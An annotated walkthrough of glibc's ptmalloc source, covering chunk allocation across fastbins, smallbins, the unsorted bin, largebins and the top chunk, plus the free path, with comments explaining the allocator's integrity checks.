clear_inuse_bit_at_offset(nextchunk, 0);

// the usual insertion into the unsorted bin
first_unsorted = unsorted_bin->fd;
unsorted_bin->fd = p;
first_unsorted->bk = p;

if (!in_smallbin_range(size)) {
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}

set_head(p, size | PREV_INUSE);
p->bk = unsorted_bin;
p->fd = first_unsorted;
set_foot(p, size);
}
else { // merge directly into the top chunk
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
}

} while ((p = nextp) != 0);
}
} while (fb++ != maxfb);
}
else { // not yet initialized
malloc_init_state(av);
check_malloc_state(av);
}
}

malloc_init_state

/*
Initialize a malloc_state struct.
This is called from ptmalloc_init () or from _int_new_arena ()
when creating a new arena.
*/
static void
malloc_init_state(mstate av)
{
int i;
mbinptr bin;
/* Establish circular links for normal bins */
for (i = 1; i < NBINS; ++i)
{
bin = bin_at(av, i);
bin->fd = bin->bk = bin; // initialization: every bin points at itself
}
#if MORECORE_CONTIGUOUS
if (av != &main_arena)
#endif
set_noncontiguous(av);
if (av == &main_arena)
set_max_fast(DEFAULT_MXFAST);
//2.26: by default an arena owns no fastbin chunks
atomic_store_relaxed(&av->have_fastchunks, false);
//2.25:
av->flags |= FASTCHUNKS_BIT;
// point this arena's top pointer at the unsorted bin, indicating an initial top chunk of size 0
av->top = initial_top(av);
}

Allocating a chunk

__libc_malloc

// just a simple wrapper around _int_malloc
void * __libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
// check for a malloc hook; if set, call it and return.
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));

#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes = request2size (bytes);
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif

// next, find an arena to try to allocate from
arena_get (ar_ptr, bytes);
// then call _int_malloc to request the memory
victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL)
{// on failure, ptmalloc tries to find another usable arena and allocate from it
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}

if (ar_ptr != NULL) // if an arena was acquired, unlock it before returning
__libc_lock_unlock (ar_ptr->mutex);
// either no memory was allocated,
// or it is mmapped memory,
// or the memory must belong to the arena it was allocated from
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
ar_ptr == arena_for_chunk (mem2chunk (victim)));
// finally, return the memory
return victim;
}

_int_malloc (very long)

static void * _int_malloc (mstate av, size_t bytes)

Variable declarations

  INTERNAL_SIZE_T nb;               /* normalized request size */
unsigned int idx; /* associated bin index */
mbinptr bin; /* associated bin */
mchunkptr victim; /* inspected/selected chunk */
INTERNAL_SIZE_T size; /* its size */
int victim_index; /* its bin index */
mchunkptr remainder; /* remainder from a split */
unsigned long remainder_size; /* its size */
unsigned int block; /* bit map traverser */
unsigned int bit; /* bit map traverser */
unsigned int map; /* current word of binmap */
mchunkptr fwd; /* misc temp for linking */
mchunkptr bck; /* misc temp for linking */
//if glibc2.26 and after
#if USE_TCACHE
size_t tcache_unsorted_count; /* count of unsorted chunks processed */
#endif
#define REMOVE_FB(fb, victim, pp) \
do \
{ \
victim = pp; \
if (victim == NULL) \
break; \
} \
while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
!= victim);

Initial checks

/*
Convert request size to internal form by adding SIZE_SZ bytes
overhead plus possibly more to obtain necessary alignment and/or
to obtain a size of at least MINSIZE, the smallest allocatable
size. Also, checked_request2size traps (returning 0) request sizes
that are so large that they wrap around zero when padded and
aligned.
*/
checked_request2size (bytes, nb);
/* There are no usable arenas. Fall back to sysmalloc to get a chunk from
mmap. */
if (__glibc_unlikely (av == NULL))
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}
  • Note that checked_request2size() is a macro, so it can modify its argument nb

fastbin_range

/*
If the size qualifies as a fastbin, first check corresponding bin.
This code is safe to execute even if av is not yet initialized, so we
can try it without checking, which saves some time on this fast path.
*/

2.25

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
idx = fastbin_index(nb);
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp = *fb;
do // pop the first fast chunk
{
victim = pp;
if (victim == NULL)
break;
} while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim);
if (victim != 0)
{
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{ // the request went bytes->nb->idx->fb, so idx is derived from the request;
// take a chunk from that bin and convert its size back to an index: if the two
// differ, the fastbin chunk's size field has been tampered with
// (presumably chunksize(victim) != nb would work just as well?)
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr(check_action, errstr, chunk2mem(victim), av);
return NULL;
}
// checks arena, size, alignment, chunk_size, and so on
check_remalloced_chunk(av, victim, nb);
// return the user pointer
void *p = chunk2mem(victim);
// if a perturb byte is set, initialize the returned chunk to perturb_byte ^ 0xff
alloc_perturb(p, bytes);
return p;
}
}

2.26

    if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
mfastbinptr *fb = &fastbin (av, idx);
mchunkptr pp;
victim = *fb;
if (victim != NULL)
{
if (SINGLE_THREAD_P)
*fb = victim->fd;
else
REMOVE_FB (fb, pp, victim);
if (__glibc_likely (victim != NULL))
{
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}

smallbin_range 2.27

  /*
If a small request, check regular bin. Since these "smallbins"
hold one size each, no searching within bins is necessary.
(For a large request, we need to wait until unsorted chunks are
processed to find best fit. But for small ones, fits are exact
anyway, so we can check now, which is faster.)
*/
if (in_smallbin_range(nb))
{
idx = smallbin_index(nb);
bin = bin_at(av, idx);

if ((victim = last(bin)) != bin) // FIFO: take from the tail
{
bck = victim->bk; // the second-to-last chunk
if (__glibc_unlikely(bck->fd != victim))
malloc_printerr("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;

if (av != &main_arena)
set_non_main_arena(victim);
check_malloced_chunk(av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset(tc_victim, nb);
if (av != &main_arena)
set_non_main_arena(tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put(tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

largebin_range

/*     If this is a large request, consolidate fastbins before continuing.     
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment. */
else
{
idx = largebin_index(nb);
if (have_fastchunks(av))
malloc_consolidate(av);
}

unsorted bin: the big loop

/*     Process recently freed or remaindered chunks, taking one only if     
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.
The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request. */
#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
tcache_nb = nb;
int return_cached = 0;
tcache_unsorted_count = 0;
#endif
for (;;)
{
int iters = 0;
while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) // take the last chunk in the list: FIFO
{
bck = victim->bk; // second-to-last chunk
// error out if victim is either too small or too large
if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) || __builtin_expect(chunksize_nomask(victim) > av->system_mem, 0))
malloc_printerr(check_action, "malloc(): memory corruption", chunk2mem(victim), av);
size = chunksize(victim);

if small try last remainder

      /*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/
// if the request is within small-chunk range,
// the unsorted bin holds exactly one chunk, that chunk is last_remainder,
// and last_remainder is large enough to still form a chunk after splitting:
if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE)) // after carving out nb, at least MINSIZE remains
{
/* split and reattach remainder */
remainder_size = size - nb;
// pointer to the chunk left over after the split
remainder = chunk_at_offset(victim, nb);
// the unsorted bin now holds only the remainder: set the bin header's fd and bk
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
// update last_remainder
av->last_remainder = remainder;
// set the remainder's fd and bk
remainder->bk = remainder->fd = unsorted_chunks(av);
if (!in_smallbin_range(remainder_size))
{// for a large chunk, also reset the nextsize pointers
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
// set both chunks' flag bits
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
// detailed checks, enabled only when MALLOC_DEBUG is 1
check_malloced_chunk(av, victim, nb);
// return the user pointer
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}

otherwise: take victim off the list, ready to place it into a suitable bin

// if none of the conditions above held, keep going
/* remove from unsorted list */
// victim is taken off the list
if (__glibc_unlikely (bck->fd != victim)) // 2.28 and later only
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);

if exact fit, tcache or return

/* Take now instead of binning if exact fit */ // an exactly fitting chunk: take it and return.
if (size == nb)
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
#if USE_TCACHE // with tcache, stash it instead of returning; it is fetched after the loop ends. return_cached is set to 1.
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put(victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif // detailed checks, enabled only when MALLOC_DEBUG is 1
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

Placing into a small or large bin

/* place chunk in bin */
// reaching here means no exactly fitting chunk existed, so victim is placed into the proper bin
if (in_smallbin_range(size))
{// small bin case
victim_index = smallbin_index(size);
bck = bin_at(av, victim_index);// the bin header in the bins array
fwd = bck->fd;// the first chunk in the small bin list
}
else
{// not small, so it goes into a large bin
victim_index = largebin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
// large bins are ordered (left to right, largest to smallest): victim must land
// in the right spot, and fd_nextsize etc. must be maintained
if (fwd != bck)
{// the large bin is non-empty
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
// what about arenas other than main_arena? threads are worth studying here
assert(chunk_main_arena(bck->bk));
// chunksize_nomask() reads the size field directly with no bit masking: hence "speed comparisons"
if ((unsigned long)(size) < (unsigned long)chunksize_nomask(bck->bk))
{// victim is smaller than the smallest chunk at the bin tail (bck->bk): put it at the far right
// point fwd at the large bin header
fwd = bck;
// point bck at the tail chunk of the large bin
bck = bck->bk;
// victim's fd_nextsize points at the first chunk of the large bin
victim->fd_nextsize = fwd->fd;
// victim's bk_nextsize takes the first chunk's bk_nextsize,
// which was the previously smallest size (chunk A);
// since victim is now smaller than A, victim's bk_nextsize must be A
victim->bk_nextsize = fwd->fd->bk_nextsize;
// the first chunk's bk_nextsize, and whatever pointed at the first chunk
// via fd_nextsize, now both point at victim
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
// victim is larger than the smallest chunk: scan left to right for its spot.
// check that fwd is in the main arena
assert(chunk_main_arena(fwd));
// walk from the list head to the first chunk not larger than victim
while ((unsigned long) size < chunksize_nomask(fwd)) {
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}
// if a chunk of exactly victim's size was found,
// insert victim right behind it, leaving the nextsize pointers untouched.
if ((unsigned long) size ==
(unsigned long) chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else {
// the chunk found differs in size from victim,
// so the nextsize list must be rebuilt: victim goes between fwd and its left neighbor
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else // the large bin is empty: fd_nextsize and bk_nextsize simply point at victim itself
victim->fd_nextsize = victim->bk_nextsize = victim;
}
// finish fixing victim's fd and bk pointers, forming bck <-> victim <-> fwd
mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd; // the two lines above link victim in at the head of the list
fwd->bk = victim;
bck->fd = victim; // bck's fd and fwd's (now the second chunk's) bk both point at victim

Checking iters (end of the big loop)

#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get(tc_idx);
}
#endif

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}// end of the big unsorted-bin loop: caps the time spent processing the unsorted bin

#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get(tc_idx);
}
#endif

large request

Note that the traversal here runs in reverse, via bk_nextsize.

   /*
If a large request, scan through the chunks of current bin in
sorted order to find smallest that fits. Use the skip list for this.
*/
// recall: before the loop, fastbin and smallbin were checked; for a largebin request,
// malloc_consolidate first flushed the fastbins into the unsorted bin. The loop then
// took chunks out of the unsorted bin one by one (last_remainder, exact fit, or binning),
// i.e. it examined only post-consolidation chunks, and none matched nb exactly. Since every
// small bin holds a single size, the small bins have now been ruled out twice, so after the
// loop we go straight to the *large* bins, to find the smallest chunk that fits — not necessarily an exact fit
if (!in_smallbin_range(nb))
{
bin = bin_at(av, idx); // idx was computed from nb before the big loop; reaching here means it is a largebin index

/* skip scan if empty or largest chunk is too small */
if ((victim = first(bin)) != bin && (unsigned long)chunksize_nomask(victim) >= (unsigned long)(nb))
{// the large bin is non-empty and its largest chunk is at least nb
// for the reverse traversal, point victim at the last (smallest) large chunk
victim = victim->bk_nextsize;
// find the first chunk not smaller than nb, assigning its size to size along the way
// (if several chunks share that size, victim lands on the first one, the one carrying the fd_nextsize pointer)
while (((unsigned long)(size = chunksize(victim)) < (unsigned long)(nb)))
victim = victim->bk_nextsize;

// if the victim selected from the large bin is not the last chunk in the list,
// and more than one chunk shares victim's size,
// then victim is a node of the chunk-size (nextsize) list;
// to avoid having to fix up that list, take victim's fd as the candidate instead
if (victim != last(bin) && chunksize_nomask(victim) == chunksize_nomask(victim->fd))
victim = victim->fd;

// about to split: unlink victim
remainder_size = size - nb;
unlink(av, victim, bck, fwd);

/* Exhaust */
if (remainder_size < MINSIZE)
{// if the leftover would be under MINSIZE, hand out the whole victim
// routinely set the inuse bit and the non-main-arena bit
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}
/* Split */
else// otherwise split: keep the front part, the surplus goes to the unsorted bin
{
remainder = chunk_at_offset(victim, nb);// pointer to the leftover chunk, as seen earlier
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
// insert at the head of the unsorted bin
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{// a simple check against a tampered fwd
errstr = "malloc(): corrupted unsorted chunks";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;// insertion complete
if (!in_smallbin_range(remainder_size))
{// for a large chunk, also reset the nextsize pointers
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
// detailed checks, enabled only when MALLOC_DEBUG is 1
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

Search for next largest bin

   /*
Search for a chunk by scanning bins, starting with next largest
bin. This search is strictly by best-fit; i.e., the smallest
(with ties going to approximately the least recently used) chunk
that fits is selected.

The bitmap avoids needing to check that most blocks are nonempty.
The particular case of skipping all bins during warm-up phases
when no chunks have been returned yet is faster than it might look.
*/
// exact fits in fastbin/smallbin --> post-consolidation fastbins + exact fits in the unsorted bin
// --> chunks >= nb in the largebin selected by nb.
// Only after all of those fail do we get here, looking for an idx larger than the current one
++idx;// simply +1
bin = bin_at(av, idx);
// the bitmap saves us from looping to test whether the list at idx+1 is empty
// (apart from mark_bin/unmark_bin/get_binmap, the binmap macros never touch the binmap array; they are pure shifts)
block = idx2block(idx); // compute the block
map = av->binmap[block];// fetch the map word
bit = idx2bit(idx); // compute this index's bit

for (;;)
{// the outer loop: either a bin is found, or none are left --> (goto use_top)
/* Skip rest of block if there are no more set bits in this block. */
if (bit > map || bit == 0)
{// the current bit is 0, and so are all higher bits in this word (bit > map); idx2bit() can never return 0 — the bit == 0 case comes from the shift loop below
do
{
if (++block >= BINMAPSIZE) /* out of bins */
goto use_top; // out of bins: only the top chunk remains
} while ((map = av->binmap[block]) == 0); // until a nonzero word is found

bin = bin_at(av, (block << BINMAPSHIFT)); // a larger, non-empty bin (word) was found
bit = 1;
}

/* Advance to bin with set bit. There must be one. */
// 1. if the if above was skipped, map already had bits at or above bit: shift left from the original bit
// 2. if the if above ran, bit restarts from the lowest position
// starting from bit, find the bin header; one must exist
while ((bit & map) == 0)
{
bin = next_bin(bin);
bit <<= 1;
assert(bit != 0);
}

/* Inspect the bin. It is likely to be non-empty */
// everything here is larger than nb, so pick the rightmost chunk: still the smallest in this bin
victim = last(bin);

/* If a false alarm (empty bin), clear the bit. */
// if victim == bin, the bin is empty: clear the corresponding map bit and take the next bin.
// this case should be rare.
if (victim == bin)
{
av->binmap[block] = map &= ~bit; /* Write through */
bin = next_bin(bin);
bit <<= 1;
}
else
{
size = chunksize(victim);

/* We know the first chunk in this bin is big enough to use. */
assert((unsigned long)(size) >= (unsigned long)(nb));

remainder_size = size - nb;

/* unlink */
unlink(av, victim, bck, fwd);

/* Exhaust */
if (remainder_size < MINSIZE)
{// too small a leftover: hand out the whole chunk
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
}
/* Split */
else
{// big enough: split
remainder = chunk_at_offset(victim, nb);

/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks 2";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
// if nb is in small bin range, record the remainder as last_remainder
if (in_smallbin_range(nb))
av->last_remainder = remainder;
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);
}
// detailed checks, enabled only when MALLOC_DEBUG is 1
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

use_top

All other options exhausted: use the top chunk.

use_top:
/* (I didn't fully follow this part of the glibc comment — "replenished", "fenceposts":)
If large enough, split off the chunk bordering the end of memory
(held in av->top). Note that this is in accord with the best-fit
search rule. In effect, av->top is treated as larger (and thus
less well fitting) than any other available chunk since it can
be extended to be as large as necessary (up to system
limitations).

We require that av->top always exists (i.e., has size >=
MINSIZE) after initialization, so if it would otherwise be
exhausted by current request, it is replenished. (The main
reason for ensuring it exists is that we may need MINSIZE space
to put in fenceposts in sysmalloc.)
*/

victim = av->top;
size = chunksize(victim);

if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
{// if top is large enough, split it
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
av->top = remainder;
set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
// detailed checks, enabled only when MALLOC_DEBUG is 1
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
/* When we are using atomic ops to free fast chunks we can get
here for all block sizes. */
else if (have_fastchunks(av))
{// top is too small, but the arena has fast chunks: malloc_consolidate() again and let the next loop iteration try
malloc_consolidate(av);
/* restore original bin index */
if (in_smallbin_range(nb))
idx = smallbin_index(nb);
else
idx = largebin_index(nb);
}
/*
Otherwise, relay to handle system-dependent cases
*/
else
{// nothing left at all: sysmalloc() grows the top chunk, and the return exits the loop
void *p = sysmalloc(nb, av);
if (p != NULL)
alloc_perturb(p, bytes);
return p;
}
}

Addendum: larger allocations — sysmalloc

/*
sysmalloc handles malloc cases requiring more memory from the system.
On entry, it is assumed that av->top does not have enough
space to service request for nb bytes, thus requiring that av->top
be **extended** or **replaced**.
*/

Case 1: using mmap

/*
If have mmap, and the request size meets the mmap threshold, and
the system supports mmap, and there are few enough currently
allocated mmapped regions, try to directly map this request
rather than expanding top.
*/

Whether mmap is used is decided mainly by the mmap control variables in mp_.

Because an mmapped chunk has no following chunk whose prev_size field it could borrow, its overhead is one extra size_t; the final size is then rounded up to the page size.

After some checks and updates of the mp_ statistics, the usable chunk is returned.
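
A rough worked example of the sizing (my own sketch, assuming 64-bit and 4 KiB pages; the rounding reflects the extra size_t of overhead described above):

#define SIZE_SZ  8UL
#define PAGESIZE 4096UL
#define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* request 0x21000 bytes:
   nb        = request2size(0x21000)          = 0x21010
   mmap size = ALIGN_UP(nb + SIZE_SZ, PAGESIZE)
             = ALIGN_UP(0x21018, 0x1000)      = 0x22000 */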

Case 2: replacing or extending top

This path involves other threads' arenas and macros like MORECORE; I don't understand it yet, so I'm skipping it for now.

Freeing a chunk

__libc_free

void __libc_free(void *mem) {
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
// check for the __free_hook hook function
void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL, 0)) {
(*hook)(mem, RETURN_ADDRESS(0));
return;
}
// free(NULL) has no effect
if (mem == 0) /* free(0) has no effect */
return;
// convert mem to its chunk pointer
p = mem2chunk(mem);
// if this memory was obtained via mmap
if (chunk_is_mmapped(p)) /* release mmapped memory. */
{
/* See if the dynamic brk/mmap threshold needs adjusting.
Dumped fake mmapped chunks do not affect the threshold. */
if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold &&
chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX &&
!DUMPED_MAIN_ARENA_CHUNK(p)) {
mp_.mmap_threshold = chunksize(p);
mp_.trim_threshold = 2 * mp_.mmap_threshold;
LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2,
mp_.mmap_threshold, mp_.trim_threshold);
}
munmap_chunk(p);
return;
}
MAYBE_INIT_TCACHE (); // the only tcache-related step here

// get the arena pointer from the chunk
ar_ptr = arena_for_chunk(p);
// perform the free
_int_free(ar_ptr, p, 0);
}

_int_free

Variable declarations

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

const char *errstr = NULL;
int locked = 0;

size = chunksize (p);

Basic checks & tcache

    /* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
// the pointer must not exceed -size: otherwise p + size would wrap around the top of the address space
// and the pointer must be aligned, to 2*SIZE_SZ (or MALLOC_ALIGNMENT)
if (__builtin_expect((uintptr_t) p > (uintptr_t) -size, 0) ||
__builtin_expect(misaligned_chunk(p), 0)) {
errstr = "free(): invalid pointer";
errout:
if (!have_lock && locked) __libc_lock_unlock(av->mutex);
malloc_printerr(check_action, errstr, chunk2mem(p), av);
return;
}
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
// the size is smaller than the minimum chunk, or not a multiple of MALLOC_ALIGNMENT
if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size))) {
errstr = "free(): invalid size";
goto errout;
}
// check that the chunk is in use; a no-op outside debug builds
check_inuse_chunk(av, p);

#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif

where:

/* Check if m has acceptable alignment */

#define aligned_OK(m) (((unsigned long) (m) &MALLOC_ALIGN_MASK) == 0)

#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem(p)) & \
MALLOC_ALIGN_MASK)

on fastbin

    /*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/

if ((unsigned long)(size) <= (unsigned long)(get_max_fast())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top) // this macro adds one condition to the if: p must not border the top chunk
#endif
)
{

if (__builtin_expect(chunksize_nomask(chunk_at_offset(p, size)) <= 2 * SIZE_SZ, 0) ||
__builtin_expect(chunksize(chunk_at_offset(p, size)) >= av->system_mem, 0))
{
/* We might not have a lock at this point and concurrent modifications
of system_mem might have let to a false positive. Redo the test
after getting the lock. */
if (have_lock || (
{
assert(locked == 0);
__libc_lock_lock(av->mutex);
locked = 1;
chunksize_nomask(chunk_at_offset(p, size)) <= 2 * SIZE_SZ ||
chunksize(chunk_at_offset(p, size)) >= av->system_mem;
}))
{
errstr = "free(): invalid next size (fast)";
goto errout;
}
if (!have_lock)
{
__libc_lock_unlock(av->mutex);
locked = 0;
}
}
// fill the chunk's mem area with perturb_byte
free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);
// set the arena's fast-chunk flag
set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin(av, idx); // fetch the fastbin head pointer

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
// multithreading details, skipping
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u; // 0xffffffff: a sentinel meaning "not set yet"
do
{
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect(old == p, 0))
{ // guard against fastbin double free (but only the bin head is checked)
errstr = "double free or corruption (fasttop)";
goto errout;
}
/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
deallocated. See use of OLD_IDX below for the actual check. */
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
p->fd = old2 = old;
} while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

if (have_lock && old != NULL && __builtin_expect(old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}

Consolidating non-mmapped free chunks

unlink is only triggered when the chunk is not a fastbin chunk.

First, why merge chunks at all: to keep the heap from filling up with scattered fragments, so the merged space can serve larger requests later. The merge order is:

  1. the physically adjacent chunk at the lower address first
  2. then the physically adjacent chunk at the higher address

The merged chunk starts at the lowest address of the chunks merged.

If no lock is held yet, acquire it first.

/*
Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p)) {
if (!have_lock) {
